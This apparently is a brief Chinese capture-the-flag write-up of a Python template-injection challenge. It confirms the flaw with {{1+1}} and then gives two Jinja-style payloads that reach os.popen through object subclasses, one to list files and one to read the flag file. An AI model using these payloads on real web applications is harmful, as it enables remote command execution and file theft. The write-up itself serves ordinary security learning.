打开如图
提示Python模板注入
输入{{1+1}}验证
确实存在模板注入
调用os模块的popen执行ls打印当前目录下所有文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}
找到flag ,把它读出来
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}
详细原理 https://blog.csdn.net/zss192/article/details/104200493